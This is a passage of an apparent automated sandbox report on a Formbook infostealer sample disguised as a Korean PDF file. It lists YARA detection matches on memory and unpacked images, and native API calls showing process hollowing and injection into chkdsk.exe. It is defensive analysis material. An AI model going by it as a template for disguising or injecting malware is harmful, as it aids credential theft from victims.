          Source: 00000002.00000001.1159543424.0000000000400000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000011.00000002.1554719039.0000000002220000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 00000011.00000002.1554719039.0000000002220000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.1163325954.0000000002670000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.1163325954.0000000002670000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000012.00000002.1570728418.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 00000012.00000002.1570728418.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000012.00000001.1550805281.0000000000400000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 00000012.00000001.1550805281.0000000000400000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000011.00000002.1555290718.0000000002560000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 00000011.00000002.1555290718.0000000002560000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000013.00000002.1573390650.0000000000760000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 00000013.00000002.1573390650.0000000000760000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.1786073120.0000000000DD0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.1786073120.0000000000DD0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.1215143868.0000000000580000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.1215143868.0000000000580000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.1163186746.0000000002630000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.1163186746.0000000002630000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.1214592086.0000000000470000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.1214592086.0000000000470000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.1789896940.00000000054F0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.1789896940.00000000054F0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.#Uc5f0#Uc554_190304,pdf.exe.2670000.3.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 0.2.#Uc5f0#Uc554_190304,pdf.exe.2670000.3.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 18.2.e2kdixix4hi0i2.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 18.2.e2kdixix4hi0i2.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.#Uc5f0#Uc554_190304,pdf.exe.2630000.2.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 0.2.#Uc5f0#Uc554_190304,pdf.exe.2630000.2.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 17.2.e2kdixix4hi0i2.exe.2220000.2.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 17.2.e2kdixix4hi0i2.exe.2220000.2.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 18.1.e2kdixix4hi0i2.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 18.1.e2kdixix4hi0i2.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 18.2.e2kdixix4hi0i2.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 18.2.e2kdixix4hi0i2.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.1.#Uc5f0#Uc554_190304,pdf.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 2.1.#Uc5f0#Uc554_190304,pdf.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 17.2.e2kdixix4hi0i2.exe.2220000.2.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 17.2.e2kdixix4hi0i2.exe.2220000.2.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.#Uc5f0#Uc554_190304,pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 2.2.#Uc5f0#Uc554_190304,pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 17.2.e2kdixix4hi0i2.exe.2560000.3.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 17.2.e2kdixix4hi0i2.exe.2560000.3.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.1.#Uc5f0#Uc554_190304,pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 2.1.#Uc5f0#Uc554_190304,pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 17.2.e2kdixix4hi0i2.exe.2560000.3.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 17.2.e2kdixix4hi0i2.exe.2560000.3.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.#Uc5f0#Uc554_190304,pdf.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 2.2.#Uc5f0#Uc554_190304,pdf.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.#Uc5f0#Uc554_190304,pdf.exe.2670000.3.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 0.2.#Uc5f0#Uc554_190304,pdf.exe.2670000.3.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.#Uc5f0#Uc554_190304,pdf.exe.2630000.2.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 0.2.#Uc5f0#Uc554_190304,pdf.exe.2630000.2.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 18.1.e2kdixix4hi0i2.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 18.1.e2kdixix4hi0i2.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: C:\Users\user\Desktop\#Uc5f0#Uc554_190304,pdf.exe | Code function: 0_2_00462D62 NtCreateSection,0_2_00462D62
          Source: C:\Users\user\Desktop\#Uc5f0#Uc554_190304,pdf.exe | Code function: 0_2_0045F1A1 NtMapViewOfSection,0_2_0045F1A1
          Source: C:\Users\user\Desktop\#Uc5f0#Uc554_190304,pdf.exe | Code function: 0_2_0045BD14 NtdllDefWindowProc_A,0_2_0045BD14
          Source: C:\Users\user\Desktop\#Uc5f0#Uc554_190304,pdf.exe | Code function: 0_2_0045FE23 VirtualAlloc,CreateProcessW,NtUnmapViewOfSection,0_2_0045FE23
          Source: C:\Users\user\Desktop\#Uc5f0#Uc554_190304,pdf.exe | Code function: 0_2_0045C4BC IsIconic,SetActiveWindow,IsWindowEnabled,SetWindowPos,NtdllDefWindowProc_A,0_2_0045C4BC
          Source: C:\Users\user\Desktop\#Uc5f0#Uc554_190304,pdf.exe | Code function: 0_2_0045C56C IsIconic,SetActiveWindow,IsWindowEnabled,NtdllDefWindowProc_A,SetWindowPos,SetFocus,0_2_0045C56C
          Source: C:\Users\user\Desktop\#Uc5f0#Uc554_190304,pdf.exe | Code function: 0_2_00450FF8 GetSubMenu,SaveDC,RestoreDC,7311B080,SaveDC,RestoreDC,NtdllDefWindowProc_A,0_2_00450FF8
          Source: C:\Users\user\Desktop\#Uc5f0#Uc554_190304,pdf.exe | Code function: 0_2_004410B4 NtdllDefWindowProc_A,GetCapture,0_2_004410B4
          Source: C:\Users\user\Desktop\#Uc5f0#Uc554_190304,pdf.exe | Code function: 0_2_00429B28 NtdllDefWindowProc_A,0_2_00429B28
          Source: C:\Users\user\Desktop\#Uc5f0#Uc554_190304,pdf.exe | Code function: 2_2_00419850 NtCreateFile,2_2_00419850
          Source: C:\Users\user\Desktop\#Uc5f0#Uc554_190304,pdf.exe | Code function: 2_2_00419900 NtReadFile,2_2_00419900
          Source: C:\Users\user\Desktop\#Uc5f0#Uc554_190304,pdf.exe | Code function: 2_2_00419980 NtClose,2_2_00419980
          Source: C:\Users\user\Desktop\#Uc5f0#Uc554_190304,pdf.exe | Code function: 2_2_00419A30 NtAllocateVirtualMemory,2_2_00419A30
          Source: C:\Users\user\Desktop\#Uc5f0#Uc554_190304,pdf.exe | Code function: 2_2_004198FA NtReadFile,2_2_004198FA
          Source: C:\Users\user\Desktop\#Uc5f0#Uc554_190304,pdf.exe | Code function: 2_2_00419AAA NtAllocateVirtualMemory,2_2_00419AAA
          Source: C:\Users\user\Desktop\#Uc5f0#Uc554_190304,pdf.exe | Code function: 2_2_00A8A2D0 NtClose,LdrInitializeThunk,2_2_00A8A2D0
          Source: C:\Users\user\Desktop\#Uc5f0#Uc554_190304,pdf.exe | Code function: 2_2_00A8A240 NtReadFile,LdrInitializeThunk,2_2_00A8A240
          Source: C:\Users\user\Desktop\#Uc5f0#Uc554_190304,pdf.exe | Code function: 2_2_00A8A3E0 NtFreeVirtualMemory,LdrInitializeThunk,2_2_00A8A3E0
          Source: C:\Users\user\Desktop\#Uc5f0#Uc554_190304,pdf.exe | Code function: 2_2_00A8A360 NtAllocateVirtualMemory,LdrInitializeThunk,2_2_00A8A360
          Source: C:\Users\user\Desktop\#Uc5f0#Uc554_190304,pdf.exe | Code function: 2_2_00A8A4A0 NtUnmapViewOfSection,LdrInitializeThunk,2_2_00A8A4A0
          Source: C:\Users\user\Desktop\#Uc5f0#Uc554_190304,pdf.exe | Code function: 2_2_00A8A480 NtMapViewOfSection,LdrInitializeThunk,2_2_00A8A480
          Source: C:\Users\user\Desktop\#Uc5f0#Uc554_190304,pdf.exe | Code function: 2_2_00A8A410 NtQueryInformationToken,LdrInitializeThunk,2_2_00A8A410
          Source: C:\Users\user\Desktop\#Uc5f0#Uc554_190304,pdf.exe | Code function: 2_2_00A8A5F0 NtReadVirtualMemory,LdrInitializeThunk,2_2_00A8A5F0
          Source: C:\Users\user\Desktop\#Uc5f0#Uc554_190304,pdf.exe | Code function: 2_2_00A8A560 NtQuerySystemInformation,LdrInitializeThunk,2_2_00A8A560
          Source: C:\Users\user\Desktop\#Uc5f0#Uc554_190304,pdf.exe | Code function: 2_2_00A8A540 NtDelayExecution,LdrInitializeThunk,2_2_00A8A540
          Source: C:\Users\user\Desktop\#Uc5f0#Uc554_190304,pdf.exe | Code function: 2_2_00A8A6A0 NtCreateSection,LdrInitializeThunk,2_2_00A8A6A0
          Source: C:\Users\user\Desktop\#Uc5f0#Uc554_190304,pdf.exe | Code function: 2_2_00A8A610 NtAdjustPrivilegesToken,LdrInitializeThunk,2_2_00A8A610
          Source: C:\Users\user\Desktop\#Uc5f0#Uc554_190304,pdf.exe | Code function: 2_2_00A8A720 NtResumeThread,LdrInitializeThunk,2_2_00A8A720
          Source: C:\Users\user\Desktop\#Uc5f0#Uc554_190304,pdf.exe | Code function: 2_2_00A8A700 NtProtectVirtualMemory,LdrInitializeThunk,2_2_00A8A700
          Source: C:\Users\user\Desktop\#Uc5f0#Uc554_190304,pdf.exe | Code function: 2_2_00A8A750 NtCreateFile,LdrInitializeThunk,2_2_00A8A750
          Source: C:\Users\user\Desktop\#Uc5f0#Uc554_190304,pdf.exe | Code function: 2_2_00A8B0B0 NtGetContextThread,2_2_00A8B0B0
          Source: C:\Users\user\Desktop\#Uc5f0#Uc554_190304,pdf.exe | Code function: 2_2_00A8A800 NtSetValueKey,2_2_00A8A800
          Source: C:\Users\user\Desktop\#Uc5f0#Uc554_190304,pdf.exe | Code function: 2_2_00A8A2F0 NtQueryInformationFile,2_2_00A8A2F0
          Source: C:\Users\user\Desktop\#Uc5f0#Uc554_190304,pdf.exe | Code function: 2_2_00A8A220 NtWaitForSingleObject,2_2_00A8A220
          Source: C:\Users\user\Desktop\#Uc5f0#Uc554_190304,pdf.exe | Code function: 2_2_00A8BA30 NtSetContextThread,2_2_00A8BA30
          Source: C:\Users\user\Desktop\#Uc5f0#Uc554_190304,pdf.exe | Code function: 2_2_00A8A260 NtWriteFile,2_2_00A8A260
          Source: C:\Users\user\Desktop\#Uc5f0#Uc554_190304,pdf.exe | Code function: 2_2_00A8A3D0 NtCreateKey,2_2_00A8A3D0
          Source: C:\Users\user\Desktop\#Uc5f0#Uc554_190304,pdf.exe | Code function: 2_2_00A8A310 NtEnumerateValueKey,2_2_00A8A310
          Source: C:\Users\user\Desktop\#Uc5f0#Uc554_190304,pdf.exe | Code function: 2_2_00A8A370 NtQueryInformationProcess,2_2_00A8A370
          Source: C:\Users\user\Desktop\#Uc5f0#Uc554_190304,pdf.exe | Code function: 2_2_00A8A350 NtQueryValueKey,2_2_00A8A350
          Source: C:\Users\user\Desktop\#Uc5f0#Uc554_190304,pdf.exe | Code function: 2_2_00A8ACE0 NtCreateMutant,2_2_00A8ACE0
          Source: C:\Users\user\Desktop\#Uc5f0#Uc554_190304,pdf.exe | Code function: 2_2_00A8A430 NtQueryVirtualMemory,2_2_00A8A430
          Source: C:\Users\user\Desktop\#Uc5f0#Uc554_190304,pdf.exe | Code function: 2_2_00A8B410 NtOpenProcessToken,2_2_00A8B410
          Source: C:\Users\user\Desktop\#Uc5f0#Uc554_190304,pdf.exe | Code function: 2_2_00A8A460 NtOpenProcess,2_2_00A8A460
          Source: C:\Users\user\Desktop\#Uc5f0#Uc554_190304,pdf.exe | Code function: 2_2_00A8A470 NtSetInformationFile,2_2_00A8A470
          Source: C:\Users\user\Desktop\#Uc5f0#Uc554_190304,pdf.exe | Code function: 2_2_00A8B470 NtOpenThread,2_2_00A8B470
          Source: C:\Users\user\Desktop\#Uc5f0#Uc554_190304,pdf.exe | Code function: 2_2_00A8A5A0 NtWriteVirtualMemory,2_2_00A8A5A0
          Source: C:\Users\user\Desktop\#Uc5f0#Uc554_190304,pdf.exe | Code function: 2_2_00A8A520 NtEnumerateKey,2_2_00A8A520
          Source: C:\Users\user\Desktop\#Uc5f0#Uc554_190304,pdf.exe | Code function: 2_2_00A8BD40 NtSuspendThread,2_2_00A8BD40
          Source: C:\Users\user\Desktop\#Uc5f0#Uc554_190304,pdf.exe | Code function: 2_2_00A8A6D0 NtCreateProcessEx,2_2_00A8A6D0
          Source: C:\Users\user\Desktop\#Uc5f0#Uc554_190304,pdf.exe | Code function: 2_2_00A8A650 NtQueueApcThread,2_2_00A8A650
          Source: C:\Users\user\Desktop\#Uc5f0#Uc554_190304,pdf.exe | Code function: 2_2_00A8A780 NtOpenDirectoryObject,2_2_00A8A780
          Source: C:\Users\user\Desktop\#Uc5f0#Uc554_190304,pdf.exe | Code function: 2_2_00A8A710 NtQuerySection,2_2_00A8A710
          Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 4_2_057CA560 NtQuerySystemInformation,LdrInitializeThunk,4_2_057CA560
          Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 4_2_057CA540 NtDelayExecution,LdrInitializeThunk,4_2_057CA540
          Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 4_2_057CA470 NtSetInformationFile,LdrInitializeThunk,4_2_057CA470
          Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 4_2_057CA410 NtQueryInformationToken,LdrInitializeThunk,4_2_057CA410
          Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 4_2_057CACE0 NtCreateMutant,LdrInitializeThunk,4_2_057CACE0
          Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 4_2_057CA480 NtMapViewOfSection,LdrInitializeThunk,4_2_057CA480
          Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 4_2_057CA750 NtCreateFile,LdrInitializeThunk,4_2_057CA750
          Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 4_2_057CA610 NtAdjustPrivilegesToken,LdrInitializeThunk,4_2_057CA610
          Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 4_2_057CA6A0 NtCreateSection,LdrInitializeThunk,4_2_057CA6A0
          Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 4_2_057CA800 NtSetValueKey,LdrInitializeThunk,4_2_057CA800
          Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 4_2_057CA360 NtAllocateVirtualMemory,LdrInitializeThunk,4_2_057CA360
          Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 4_2_057CA350 NtQueryValueKey,LdrInitializeThunk,4_2_057CA350
          Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 4_2_057CA310 NtEnumerateValueKey,LdrInitializeThunk,4_2_057CA310
          Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 4_2_057CA3E0 NtFreeVirtualMemory,LdrInitializeThunk,4_2_057CA3E0
          Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 4_2_057CA3D0 NtCreateKey,LdrInitializeThunk,4_2_057CA3D0
          Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 4_2_057CA260 NtWriteFile,LdrInitializeThunk,4_2_057CA260
          Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 4_2_057CA240 NtReadFile,LdrInitializeThunk,4_2_057CA240
          Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 4_2_057CA2D0 NtClose,LdrInitializeThunk,4_2_057CA2D0
          Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 4_2_057CBD40 NtSuspendThread,4_2_057CBD40
          Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 4_2_057CA520 NtEnumerateKey,4_2_057CA520
          Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 4_2_057CA5F0 NtReadVirtualMemory,4_2_057CA5F0
          Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 4_2_057CA5A0 NtWriteVirtualMemory,4_2_057CA5A0
          Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 4_2_057CB470 NtOpenThread,4_2_057CB470
          Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 4_2_057CA460 NtOpenProcess,4_2_057CA460
          Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 4_2_057CA430 NtQueryVirtualMemory,4_2_057CA430
          Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 4_2_057CB410 NtOpenProcessToken,4_2_057CB410
          Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 4_2_057CA4A0 NtUnmapViewOfSection,4_2_057CA4A0
          Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 4_2_057CA720 NtResumeThread,4_2_057CA720
          Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 4_2_057CA710 NtQuerySection,4_2_057CA710
          Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 4_2_057CA700 NtProtectVirtualMemory,4_2_057CA700
          Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 4_2_057CA780 NtOpenDirectoryObject,4_2_057CA780
          Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 4_2_057CA650 NtQueueApcThread,4_2_057CA650
          Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 4_2_057CA6D0 NtCreateProcessEx,4_2_057CA6D0
          Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 4_2_057CB0B0 NtGetContextThread,4_2_057CB0B0
          Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 4_2_057CA370 NtQueryInformationProcess,4_2_057CA370
          Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 4_2_057CBA30 NtSetContextThread,4_2_057CBA30
          Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 4_2_057CA220 NtWaitForSingleObject,4_2_057CA220
          Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 4_2_057CA2F0 NtQueryInformationFile,4_2_057CA2F0
          Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 4_2_00DB9850 NtCreateFile,4_2_00DB9850
          Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 4_2_00DB9980 NtClose,4_2_00DB9980
          Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 4_2_00DB9900 NtReadFile,4_2_00DB9900
          Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 4_2_00DB9A30 NtAllocateVirtualMemory,4_2_00DB9A30
          Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 4_2_00DB98FA NtReadFile,4_2_00DB98FA
          Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 4_2_00DB9AAA NtAllocateVirtualMemory,4_2_00DB9AAA
          Source: C:\Program Files (x86)\Lp4ml\e2kdixix4hi0i2.exe | Code function: 18_2_00ABA2D0 NtClose,LdrInitializeThunk,18_2_00ABA2D0
          Source: C:\Program Files (x86)\Lp4ml\e2kdixix4hi0i2.exe | Code function: 18_2_00ABA240 NtReadFile,LdrInitializeThunk,18_2_00ABA240
          Source: C:\Program Files (x86)\Lp4ml\e2kdixix4hi0i2.exe | Code function: 18_2_00ABA3E0 NtFreeVirtualMemory,LdrInitializeThunk,18_2_00ABA3E0
          Source: C:\Program Files (x86)\Lp4ml\e2kdixix4hi0i2.exe | Code function: 18_2_00ABA360 NtAllocateVirtualMemory,LdrInitializeThunk,18_2_00ABA360
          Source: C:\Program Files (x86)\Lp4ml\e2kdixix4hi0i2.exe | Code function: 18_2_00ABA4A0 NtUnmapViewOfSection,LdrInitializeThunk,18_2_00ABA4A0
          Source: C:\Program Files (x86)\Lp4ml\e2kdixix4hi0i2.exe | Code function: 18_2_00ABA480 NtMapViewOfSection,LdrInitializeThunk,18_2_00ABA480
          Source: C:\Program Files (x86)\Lp4ml\e2kdixix4hi0i2.exe | Code function: 18_2_00ABA410 NtQueryInformationToken,LdrInitializeThunk,18_2_00ABA410
          Source: C:\Program Files (x86)\Lp4ml\e2kdixix4hi0i2.exe | Code function: 18_2_00ABA5F0 NtReadVirtualMemory,LdrInitializeThunk,18_2_00ABA5F0
          Source: C:\Program Files (x86)\Lp4ml\e2kdixix4hi0i2.exe | Code function: 18_2_00ABA560 NtQuerySystemInformation,LdrInitializeThunk,18_2_00ABA560
          Source: C:\Program Files (x86)\Lp4ml\e2kdixix4hi0i2.exe | Code function: 18_2_00ABA540 NtDelayExecution,LdrInitializeThunk,18_2_00ABA540
          Source: C:\Program Files (x86)\Lp4ml\e2kdixix4hi0i2.exe | Code function: 18_2_00ABA6A0 NtCreateSection,LdrInitializeThunk,18_2_00ABA6A0
          Source: C:\Program Files (x86)\Lp4ml\e<